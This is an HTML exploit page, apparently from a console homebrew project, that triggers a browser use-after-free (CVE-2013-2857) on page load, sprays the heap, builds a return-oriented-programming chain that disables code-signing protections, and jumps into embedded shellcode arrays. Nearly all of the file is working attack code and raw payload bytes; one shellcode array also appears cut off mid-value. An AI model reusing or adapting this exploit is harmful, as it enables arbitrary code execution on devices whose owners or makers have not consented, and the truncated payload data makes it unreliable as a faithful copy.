JsTypeHax/payload/exploit.html

250 lines
102 KiB
HTML
Raw Normal View History

2017-08-22 21:51:45 +02:00
<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
-->
<script>
function UaF(a)
{
//Warning, the delta was modified !
var delta = 0x00000000; //from 0x0 to 0x04000000 step by 0x01000000
var pivotAdress = 0x010ADDCC;
var pivotAdressAdress = 0x1BB00000; //r6
var payloadAdress = 0x1D000000 + delta;
var codegenAddress = 0x01800000;
var sizeWebCoreImageLoader = 0x18;
var sprayCount = 0x1000;
var _4K = 0x1000;
var _16K = 0x4000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
//Allocate this new WebCore::ImageLoader over freed WebCore::
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
var dv = new DataView(ab)
/*
0:000:x86> dt webkit!WebCore::ImageLoader
+0x000 __VFN_table : Ptr32
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
+0x00c m_failedLoadURL : WTF::AtomicString
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
+0x010 m_imageComplete : Pos 3, 1 Bit
+0x010 m_loadManually : Pos 4, 1 Bit
+0x010 m_elementIsProtected : Pos 5, 1 Bit
*/
//Register:r3 Adress:0x1AF35330-0x1AF35360
dv.setUint32(0x00, 0x00000000); //vtable
dv.setUint32(0x04, pivotAdressAdress); //m_client
dv.setUint32(0x08, pivotAdressAdress); //m_image
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
dv.setUint32(0x14, 0x00000000); //padding
//Rop offset
{
ROP_POPJUMPLR_STACK12 = 0x0101cd24;
ROP_POPJUMPLR_STACK20 = 0x01024d88;
ROP_CALLFUNC = 0x01080274;
ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
ROP_POP_R28R29R30R31 = 0x0101d8d4;
ROP_POP_R27 = 0x0101cb00;
ROP_POP_R24_TO_R31 = 0x010204c8;
ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
ROP_memcpy = 0x01035fc8;
ROP_DCFlushRange = 0x01023f88;
ROP_ICInvalidateRange = 0x010240b0;
ROP_OSSwitchSecCodeGenMode = 0x010376c0;
ROP_OSCodegenCopy = 0x010376d8;
ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
ROP_OSGetCoreId = 0x01024e8c;
ROP_OSGetCurrentThread = 0x01043150;
ROP_OSSetThreadAffinity = 0x010429dc;
ROP_OSYieldThread = 0x010418e4;
ROP_OSFatal = 0x01031618;
ROP_Exit = 0x0101cd80;
ROP_OSScreenFlipBuffersEx = 0x0103afd0;
ROP_OSScreenClearBufferEx = 0x0103b090;
ROP_OSDynLoad_Acquire = 0x0102a3b4;
ROP_OSDynLoad_FindExport = 0x0102b828;
ROP_os_snprintf = 0x0102f160;
}
//Rop helper
{
var ropCurrentDv = null;
var ropCurrentOffset = 0;
function ropchain_appendu32(val)
{
ropCurrentDv.setUint32(ropCurrentOffset, val);
ropCurrentOffset += 4;
}
function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
{
ropchain_appendu32(ROP_POP_R24_TO_R31);
ropchain_appendu32(0x0);
ropchain_appendu32(0x0);
ropchain_appendu32(r24);
ropchain_appendu32(r25);
ropchain_appendu32(r26);
ropchain_appendu32(r27);
ropchain_appendu32(r28);
ropchain_appendu32(r29);
ropchain_appendu32(r30);
ropchain_appendu32(r31);
ropchain_appendu32(0x0);
}
function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
{
ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
ropchain_appendu32(ROP_CALLFUNC);
ropchain_appendu32(r28);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}
function ropgen_switchto_core1()
{
ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
ropchain_appendu32(ROP_OSYieldThread);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
ropchain_appendu32(0x0);//r28
ropchain_appendu32(0x0);//r29
ropchain_appendu32(0x0);//r30
ropchain_appendu32(0x0);//r31
ropchain_appendu32(0x0);
}
function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
{
ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
}
function ropgen_memcpy(dst, src, size)
{
ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
}
function ropgen_DCFlushRange(addr, size)
{
ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
}
function ropgen_ICInvalidateRange(addr, size)
{
ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
}
function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
{
ropgen_OSSwitchSecCodeGenMode(0);
ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
ropgen_OSSwitchSecCodeGenMode(1);
ropgen_DCFlushRange(codegen_addr, codebin_size);
ropgen_ICInvalidateRange(codegen_addr, codebin_size);
}
}
//Spray large ArrayBuffer with pivotAdress
//Middle range 0x1B100000
var ar = new Array(0x1800);
for(var i=0; i<0x1800; i++){
ar[i] = new DataView(new ArrayBuffer(_4K));
for(var j=0; j<_4K; j+=4){
ar[i].setUint32(j, 0x10000000+j); //filler
}
ar[i].setUint32(0x204, 0x0);
ar[i].setUint32(0x018, pivotAdressAdress);
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
//r11, new stack location
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
//initialize this Rop Chain
ropCurrentDv = ar[i];
ropCurrentOffset = 0x304;
//start of the Rop Chain
//switch to core1
ropgen_switchto_core1();
//copy to payload to codegen
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K) //16K is too much, but ok
//prepare payload argument
payload_srcaddr = payloadAdress;
ROPHEAP = payload_srcaddr + 0x800000;
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
//Jump on the payload
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
//Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
ropchain_appendu32(0x0);
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)//16K is too much, but ok
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
}
//final payload to be executed by the miniloader
//Must be between 1B000000 and 1D000000, this is OK
var finalPayload = new Uint8Array(
[
0x4C, 0x4F, 0x4F, 0x4B, 0x48, 0x45, 0x52, 0x45, //magic
0x00, 0x40, 0x00, 0x00, //size
//binary of hbl code550.bin
0x3c, 0x20, 0x1a, 0xb5, 0x60, 0x21, 0xd1, 0x38, 0x48, 0x00, 0x14, 0x09, 0x38, 0x00, 0x25, 0x00, 0x44, 0x00, 0x00, 0x02, 0x4e, 0x80, 0x00, 0x20, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xf0, 0x93, 0xc1, 0x00, 0x04, 0x93, 0xe1, 0x00, 0x08, 0x7c, 0x05, 0x03, 0x78, 0x7c, 0x26, 0x0b, 0x78, 0x38, 0x00, 0x36, 0x00, 0x44, 0x00, 0x00, 0x02, 0x60, 0x00, 0x00, 0x00, 0x7c, 0xa0, 0x2b, 0x78, 0x7c, 0xc1, 0x33, 0x78, 0x83, 0xc1, 0x00, 0x04, 0x83, 0xe1, 0x00, 0x08, 0x38, 0x21, 0x00, 0x10, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x7f, 0xd8, 0x82, 0xa6, 0x7f, 0xf9, 0x82, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x24, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x30, 0x80, 0x90, 0x83, 0x00, 0x00, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0x12, 0x90, 0x83, 0x00, 0x04, 0x3c, 0x80, 0x7c, 0xf1, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x08, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x00, 0x80, 0x90, 0x83, 0x00, 0x0c, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0xff, 0x90, 0x83, 0x00, 0x10, 0x3c, 0x80, 0x7c, 0xf0, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x14, 0x3c, 0x80, 0x7c, 0x00, 0x60, 0x84, 0x06, 0xac, 0x90, 0x83, 0x00, 0x18, 0x3c, 0x80, 0x4c, 0x00, 0x60, 0x84, 0x01, 0x2c, 0x90, 0x83, 0x00, 0x1c, 0x3c, 0x80, 0x7c, 0xe8, 0x60, 0x84, 0x02, 0xa6, 0x90, 0x83, 0x00, 0x20, 0x3c, 0x80, 0x48, 0x80, 0x60, 0x84, 0x00, 0x03, 0x90, 0x83, 0x00, 0x24, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x20, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x40, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x04, 0xac, 0x3c, 0x60, 0x30, 0x80, 0x60, 0x63, 0x00, 0x12, 0x7c, 0x71, 0x8b, 0xa6, 0x3c, 0x60, 0x00, 0x80, 0x60, 0x63, 0x00, 0xff, 0x7c, 0x70, 0x8b, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0x6c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0xf8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xcc, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x0c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x28, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd8, 0x2c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc4, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x7f, 0xd8, 0x83, 0xa6, 0x7f, 0xf9, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x4c, 0x00, 0x00, 0x64, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xe0, 0x3d, 0x20, 0x01, 0x02, 0x3c, 0xa0, 0x01, 0x80, 0x61, 0x29, 0xb8, 0x28, 0x93, 0xe1, 0x00, 0x1c, 0x90, 0x01, 0x00, 0x24, 0x7c, 0x9f, 0x23, 0x78, 0x38, 0xa5, 0x1c, 0x6c, 0x38, 0x80, 0x00, 0x00, 0x38, 0xc1, 0x00, 0x08, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x2f, 0x9f, 0x00, 0x00, 0x41, 0x9e, 0x00, 0x18, 0x81, 0x21, 0x00, 0x08, 0x3b, 0xff, 0xff, 0xff, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x4b, 0xff, 0xff, 0xe8, 0x39, 0x61, 0x00, 0x20, 0x48, 0x00, 0x19, 0x1c,
]
);
//Spray mini loader payload 4K
//Middle range payloadAdress
//Must be between 1D000000 and 1E000000 must be at payloadAdress, this is OK !
var ar2 = new Array(sprayCount*4);
for(var i=0; i<sprayCount*4; i++){
ar2[i] = new Uint8Array(
//from codebin2js.py
[
0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x0
0x3c, 0xe0, 0x1b, 0x00, 0x3d, 0x00, 0x1d, 0x00, 0x3d, 0x20, 0x4c, 0x4f, 0x61, 0x29, 0x4f, 0x4b, 0x3d, 0x40, 0x48, 0x45, 0x61, 0x4a, 0x52, 0x45, 0x81, 0x67, 0x00, 0x00, 0x7c, 0x0b, 0x48, 0x00, 0x40, 0x82, 0x00, 0x10, 0x81, 0x67, 0x00, 0x04, 0x7c, 0x0b, 0x50, 0x00, 0x41, 0x82, 0x00, 0x14, 0x38, 0xe7, 0x00, 0x04, 0x7c, 0x07, 0x40, 0x00, 0x40, 0x80, 0x01, 0xc0, 0x4b, 0xff, 0xff, 0xdc, 0x81, 0x67, 0x00, 0x08, 0x38, 0xe7, 0x00, 0x0c, 0x39, 0x40, 0x00, 0x00, 0x91, 0x41, 0x00, 0x00, 0x91, 0x41, 0x00, 0x08, 0x91, 0x41, 0x00, 0x0c, 0x91, 0x41, 0x00, 0x10, 0x91, 0x41, 0x00, 0x14, 0x91, 0x41, 0x00, 0x18, 0x91, 0x41, 0x00, 0x24, 0x91, 0x41, 0x00, 0x28, 0x91, 0x41, 0x00, 0x2c, 0x91, 0x41, 0x00, 0x30, 0x91, 0x41, 0x00, 0x38, 0x91, 0x41, 0x00, 0x3c, 0x91, 0x41, 0x00, 0x40, 0x91, 0x41, 0x00, 0x44, 0x91, 0x41, 0x00, 0x48, 0x91, 0x41, 0x00, 0x50, 0x91, 0x41, 0x00, 0x54, 0x91, 0x41, 0x00, 0x58, 0x91, 0x41, 0x00, 0x60, 0x91, 0x41, 0x00, 0x70, 0x91, 0x41, 0x00, 0x78, 0x91, 0x41, 0x00, 0x80, 0x91, 0x41, 0x00, 0x84, 0x91, 0x41, 0x00, 0x88, 0x91, 0x41, 0x00, 0x8c, 0x91, 0x41, 0x00, 0x90, 0x91, 0x41, 0x00, 0x98, 0x91, 0x41, 0x00, 0x9c, 0x91, 0x41, 0x00, 0xa0, 0x91, 0x41, 0x00, 0xa4, 0x91, 0x41, 0x00, 0xa8, 0x91, 0x41, 0x00, 0xb8, 0x91, 0x41, 0x00, 0xbc, 0x91, 0x41, 0x00, 0xc0, 0x91, 0x41, 0x00, 0xc8, 0x91, 0x41, 0x00, 0xcc, 0x91, 0x41, 0x00, 0xd0, 0x91, 0x41, 0x00, 0xd4, 0x91, 0x41, 0x00, 0xd8, 0x91, 0x41, 0x00, 0xe0, 0x91, 0x41, 0x00, 0xe4, 0x91, 0x41, 0x00, 0xe8, 0x91, 0x41, 0x00, 0xec, 0x91, 0x41, 0x00, 0xf0, 0x91, 0x41, 0x01, 0x00, 0x91, 0x41, 0x01, 0x08, 0x91, 0x41, 0x01, 0x10, 0x91, 0x41, 0x01, 0x14, 0x91, 0x41, 0x01, 0x18, 0x91, 0x41, 0x01, 0x1c, 0x91, 0x41, 0x01, 0x20, 0x91, 0x41, 0x01, 0x28, 0x91, 0x41, 0x01, 0x2c, 0x91, 0x41, 0x01, 0x30, 0x91, 0x41, 0x01, 0x34, 0x91, 0x41, 0x01, 0x38, 0x91, 0x41, 0x01, 0x48, 0x91, 0x41, 0x01, 0x50, 0x91, 0x41, 0x01, 0x58, 0x39, 0x40, 0x00, 0x01, 0x91, 0x41, 0x00, 0xb4, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x04, 0xc8, 0x91, 0x41, 0x00, 0x04, 0x91, 0x41, 0x00, 0x4c, 0x91, 0x41, 0x00, 0x94, 0x91, 0x41, 0x00, 0xdc, 0x91, 0x41, 0x01, 0x24, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x3f, 0x88, 0x91, 0x41, 0x00, 0xf8, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x40, 0xb0, 0x91, 0x41, 0x01, 0x40, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x5f, 0xc8, 0x91, 0x41, 0x00, 0x68, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x76, 0xc0, 0x91, 0x41, 0x00, 0x20, 0x91, 0x41, 0x00, 0xb0, 0x3d, 0x40, 0x01, 0x07, 0x61, 0x4a, 0xdd, 0x70, 0x91, 0x41, 0x00, 0x1c, 0x91, 0x41, 0x00, 0x64, 0x91, 0x41, 0x00, 0xac, 0x91, 0x41, 0x00, 0xf4, 0x91, 0x41, 0x01, 0x3c, 0x3d, 0x40, 0x01, 0x08, 0x61, 0x4a, 0x02, 0x74, 0x91, 0x41, 0x00, 0x34, 0x91, 0x41, 0x00, 0x7c, 0x91, 0x41, 0x00, 0xc4, 0x91, 0x41, 0x01, 0x0c, 0x91, 0x41, 0x01, 0x54, 0x3d, 0x40, 0x01, 0x80, 0x91, 0x41, 0x00, 0x6c, 0x91, 0x41, 0x00, 0xfc, 0x91, 0x41, 0x01, 0x44, 0x91, 0x41, 0x01, 0x5c, 0x90, 0xe1, 0x00, 0x74, 0x91, 0x61, 0x00, 0x5c, 0x91, 0x61, 0x01, 0x04, 0x91, 0x61, 0x01, 0x4c, 0x80, 0x01, 0x00, 0x04, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x4e, 0x80, 0x00, 0x20,
]
);
}
alert("verify...");
//Use the new WebCore::ImageLoader & pivot !
return 0;
}
</script>
<input id="x" type="image" onerror="UaF(this);" src=""/>